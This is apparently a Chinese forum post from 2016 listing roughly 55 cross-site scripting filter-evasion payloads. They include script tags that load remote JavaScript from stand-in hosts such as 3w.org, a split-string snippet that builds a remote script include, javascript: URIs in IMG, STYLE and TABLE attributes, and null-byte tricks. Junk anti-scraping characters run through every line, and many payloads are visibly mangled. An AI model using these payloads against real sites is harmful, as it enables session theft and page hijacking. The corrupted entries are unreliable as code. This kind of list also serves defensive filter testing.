(1)普通的XSS JavaScript注入
1 I& e! q2 a. L, f- q" M) {<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>9 ?3 b) V6 z2 A" C: I4 P
(99)另类弹框5 I+ d$ M" [1 A E+ M
<q/oncut=alert()>18 _; i8 S y2 P4 ], t5 D
<s/onclick=alert()>b
I" M' G( D0 \ <XSS=" onclick="alert(1)//">clickme</SSX=">
* ^- v! H% ]6 d9 o. l <zzz onclick=alert`1`>clickme</zzz> 8 z, w, w$ c8 i3 R
<a onclick=alert`1`>clickme</a>: R6 q" R+ V3 [/ `0 h6 }
<a=">clickme</a=">. d: \5 ~- L, y$ D7 `' T/ V# t6 L
<a=">clickme</a>9 B. V( ~% Z: h( R/ w& W R
<z=">clickme</z=">
, b* q$ }& `, }<z onclick=alert`1`>clickme</z>
7 S4 d* _3 L* X' Q4 a: B
! m' m0 U7 R+ v/ |: ?, @(2)IMG标签XSS使用JavaScript命令/ J/ o7 N7 L0 V; `6 d: }
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 {- B3 ?( B" j: @
# ?6 e! C6 ?5 K) X2 U(3)IMG标签无分号无引号
) z/ C& t, F; o# G7 L<IMG SRC=javascript:alert(‘XSS’)>: p% Y1 F9 i) X6 m% |5 q
2 {+ K0 s) g* `2 S4 N5 @7 s
(4)IMG标签大小写不敏感
~4 \) ^% M) U& L: I- Q" m$ }<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
, ^8 F# o; U" F/ h0 W% Z" a& ^2 Y! `3 `/ p
(5)HTML编码(必须有分号)
9 Q5 }! s, u5 ~) J6 L/ l<IMG SRC=javascript:alert(“XSS”)>
2 w: T6 l" m. @6 n) ^, h0 M, |/ s9 B, Y+ M( C5 }" v( U* l2 f1 I
(6)修正缺陷IMG标签/ x) I0 Y+ e( x- N3 R
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>. L' O+ Q0 d. R: E
" y# e: ^2 C: h* C
(7)formCharCode标签(计算器); _( F3 M! u# V' c" H: U8 u+ T! ?
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" Z: t6 s! E! \# [! m0 n; O
2 y7 u6 v, {/ E P: l
(8)UTF-8的Unicode编码(计算器)
, @2 S; f/ b. I1 f$ I: E# k<IMG SRC=jav..省略..S')>, I' ?. V: G" d' o) {
l4 X& D9 c2 `" V9 B! l(9)7位的UTF-8的Unicode编码是没有分号的(计算器)& Q6 Y; Q. s: A* p$ X' \( ^; _
<IMG SRC=jav..省略..S')>
3 y6 w& }/ a% R4 o
1 q) r) }/ M4 A* @(10)十六进制编码也是没有分号(计算器); X' B: ~# Z8 V: i& t/ ]4 i6 u
<IMG SRC=\'#\'" /span>" s7 n% i( l, d r! m. R8 x
1 p+ P8 X/ G0 m9 n+ W) t(11)嵌入式标签,将Javascript分开: Y: p- Y" W4 ~
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
4 z& w' U5 x& }3 c/ p! l- q9 u% D7 W! g& ?# M6 T) j' w2 C
(12)嵌入式编码标签,将Javascript分开
o$ P. W4 M( u# I2 U<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 |9 d, R' J! S/ ]
) D! K6 _" M% N2 b* W" G5 m(13)嵌入式换行符
! f3 G( h0 H. H* ]+ `<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>! |- N/ S& x t6 U- f
# R" h( d& E" l) ?/ s( D3 g(14)嵌入式回车
1 F& d8 O; Y6 H! S. E; F<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> U& A9 M8 @+ r A: R2 d! j1 V
" Q3 T1 N4 R0 w! \
(15)嵌入式多行注入JavaScript,这是XSS极端的例子4 I$ h! S9 p8 M+ u6 R/ u$ ^1 {- t" U
<IMG SRC=\'#\'" /span>
1 i$ J8 Q4 n3 ?. y5 Z' ^
6 A+ j- Q) i9 D4 F(16)解决限制字符(要求同页面) K1 C; [8 _) E8 [. `
<script>z=’document.’</script>
) F# b, J8 [& i- K<script>z=z+’write(“‘</script>2 \" q( Q4 r1 R
<script>z=z+’<script’</script>8 t* ?- W! @' b+ k
<script>z=z+’ src=ht’</script>
S' P+ E3 ?8 O3 o9 [8 v<script>z=z+’tp://ww’</script>2 K9 K" h$ M! C* D+ g
<script>z=z+’w.shell’</script>
- B2 W* h# V5 r' ~" v' j<script>z=z+’.net/1.’</script>
- z) p" K. H) v<script>z=z+’js></sc’</script>/ h4 @2 K0 o4 N7 B" D6 u- e, J
<script>z=z+’ript>”)’</script>
# n# T8 S; ]2 O<script>eval_r(z)</script>
2 w! z) J) ?+ T. Y4 Q
}, }' O) D$ E1 p(17)空字符
l: H) e8 x Y8 Y$ S! eperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
0 G: E M+ ?5 |% e( r# s, N0 T+ z) k4 i- z+ M0 \
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 i) h4 D" l1 B; G7 } Jperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
, j% n7 Z1 ]* q, n# m: [
: c: A% v3 n7 P' A j' V/ {(19)Spaces和meta前的IMG标签
- D4 j% j- T. t$ t; Z, F' W<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
5 v* j, @' u# s& V5 g/ [& g5 S5 a# M5 O# B( b% u
(20)Non-alpha-non-digit XSS
! {; b }# M3 O4 v" m<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>6 c' y7 E s9 a' T' M2 a4 Q
2 W0 A6 C, z I
(21)Non-alpha-non-digit XSS to 2' I; W1 z+ S6 G$ |" V
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>. p% C4 F0 n; O. ?" D7 t
7 w" F& A7 W, p+ ~' o4 r(22)Non-alpha-non-digit XSS to 3
& {# n3 j# ^+ C0 k<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>- u: |: f& F' N. r
0 K$ x w# l, F; |' K3 b# ~* H4 J. X
(23)双开括号
" x3 G" _( _( J1 a8 f9 i" [; _<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. ?1 i& S `- w. P( s2 q# }5 y# l8 C2 B
(24)无结束脚本标记(仅火狐等浏览器)! j" X0 q9 g2 V2 K: @& a r
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- X k* C' l! H& R+ o0 W) }3 T) N6 t& q% ^% z) d$ b! @/ T8 s
(25)无结束脚本标记2: k( M# X$ L. [' J3 B0 _
<SCRIPT SRC=//3w.org/XSS/xss.js>
) n0 f [4 }7 G' `9 ]- p* g3 M& K3 f+ T
(26)半开的HTML/JavaScript XSS
) c/ i- n9 b! U<IMG SRC=\'#\'" /span>6 S z# ~; l2 f" u
) c: C' U( ]5 b6 Y(27)双开角括号8 { M2 ^0 z/ y. Q+ {7 i+ i
<iframe src=http://3w.org/XSS.html <
$ u* F1 S/ i- B. L( O
6 G2 |6 q- w' C(28)无单引号 双引号 分号
! y J# N3 E. F3 `: o# L<SCRIPT>a=/XSS/
0 x, l+ p$ w0 T; {alert(a.source)</SCRIPT>& V2 _! f: I- b: @
; p% z1 i. X! o) j j5 y/ u# x2 b, V(29)换码过滤的JavaScript) ]8 |( P# `' A) ]* b
\”;alert(‘XSS’);//+ d* v* |3 e+ U7 D% X
9 x3 ?- S9 _0 n, L8 n* J$ c. L# C
(30)结束Title标签
+ O$ J& k. j) g4 i: N4 g; R* E ~</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ a* p3 y+ U/ M5 r" ]
7 Y- Q0 K2 }5 Y
(31)Input Image+ T9 ?" b/ h# N8 A7 C
<INPUT SRC=\'#\'" /span>
5 v3 H l4 J n! ~# D! @- m4 |
6 j! d/ N% H4 d E9 f& |3 m(32)BODY Image# u9 }/ [ ^7 P7 ?2 b
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
& E {2 o+ c- S: \
$ ^/ ]% M! c$ c K& r(33)BODY标签. ~% ?. i0 ]7 C3 d7 z
<BODY(‘XSS’)>
! L! g( C8 |& |0 Z+ k E! s1 ]* w3 _# @9 v) w
(34)IMG Dynsrc! M/ f3 A l4 a- l6 R. l
<IMG DYNSRC=\'#\'" /span>) N9 `0 z. f: t9 s/ o' ^1 D7 _
# S, g( r0 j+ O6 d) e8 _(35)IMG Lowsrc
, U9 Q8 W3 R. w7 T* A<IMG LOWSRC=\'#\'" /span>1 j X% x8 F2 |1 B3 l- y3 x' V
5 H3 y7 l2 y. D2 Z(36)BGSOUND
1 V$ V" j5 s4 r- V$ v. o9 M" ~: K0 g<BGSOUND SRC=\'#\'" /span>" x2 Q' H8 e" j# \/ h7 R
" K7 P0 L) ?2 q
(37)STYLE sheet' N8 s" N6 t* C: N0 i& }$ o
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>2 ~/ D3 k* l6 W3 n/ T3 p+ n
4 _: ^) C3 R, ]: e7 Y(38)远程样式表
7 j4 p' {1 ^% e5 W<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
6 Q+ _! O( m' q8 t3 n! f/ B- l0 V& N
(39)List-style-image(列表式)
' u; a: M$ g; e e: _<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" w% N; z0 X3 g; d! V; `7 b I) }, P
/ l7 f( Q4 ^/ K" o3 q' e/ a0 F(40)IMG VBscript0 f+ _/ P! L8 X% w# K* C
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
7 m; h3 i' h% O8 M) w/ r6 N. W! V( A
(41)META链接url
) w* N, v' f4 ~: K# |0 a( c+ l<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
/ W* V# c7 o2 |
0 ?4 d+ Q0 t$ ?: Z8 k$ C(42)Iframe9 }9 s0 G2 ~2 T& \9 r- [
<IFRAME SRC=\'#\'" /IFRAME>! x$ d% p. l9 T/ u2 m! b, m; m
$ I6 G+ m% ^- z2 F* _
(43)Frame7 d3 D% k! R' ~% j9 n H5 Z/ j/ [
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
3 O+ d- o/ n+ \8 _: m5 X& J. n8 H
$ {2 ?, H" I: L' X4 r(44)Table
$ |# A: [( d4 M- |! D- ~% J<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 }" t4 W$ z& B( X; l8 A! v: j* m* m# b, _9 N9 i
(45)TD( @/ p, l7 D$ P
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>1 x5 O2 {" i) R3 D! j/ A
4 w$ G- h- k+ n- v
(46)DIV background-image+ J, F7 c9 j$ R }# E
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' o# Y& h4 U! M3 x3 ]8 q' ?
' {# V9 |8 T/ l' g5 o
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)4 d- H% V, e. D& b( p; d* E
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
" x* q7 z) |9 l# r3 \2 N2 A6 G; J6 W0 Q( R; T
(48)DIV expression d% q6 s4 J' ^: _! X5 y
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 ]( M" k0 J+ T4 a" c' V
2 E) b) p" G2 @6 L: K7 K* L, p(49)STYLE属性分拆表达
; U4 D b" ]2 A3 H# f N<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ N" z+ n+ R! B% k+ j2 t% H
! c% @$ s6 e# P0 O( f$ g8 E8 [. [(50)匿名STYLE(组成:开角号和一个字母开头)
% t! V& T6 W c<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 y# Q. t- z3 U- M5 e n6 Z& r" G9 V# T ^; K% i
(51)STYLE background-image
+ d. \* v- ^- i( `. b<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>* g7 O: w" m2 P$ G) |; ^2 n* a
6 J d0 \9 Y( p* F: K
(52)IMG STYLE方式4 I% v( l0 [5 W, n8 T- K" o
exppression(alert(“XSS”))’>. G/ e8 }* W' Z( ^* Z; j
4 }8 h% @% p+ u! ~! V(53)STYLE background
* |9 c) T4 B7 O+ H<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: l- t& z, i+ O) [$ k: r3 E+ \6 r) I
9 G- ]2 l$ h* H% q( R: _* y* b: h. p(54)BASE
+ Y7 m' f; ?/ ?& E: V6 D5 T8 M! v<BASE HREF=”javascript:alert(‘XSS’);//”>+ t6 e. T5 o) m5 D
7 [ D1 c: `5 _( W" x1 F% I
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ J( o1 O2 y4 A1 X8 w) d) i/ a6 t<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>, R: z/ Y; @ p) W
|
发表于 2016-4-28 10:06:15
收藏
支持
反对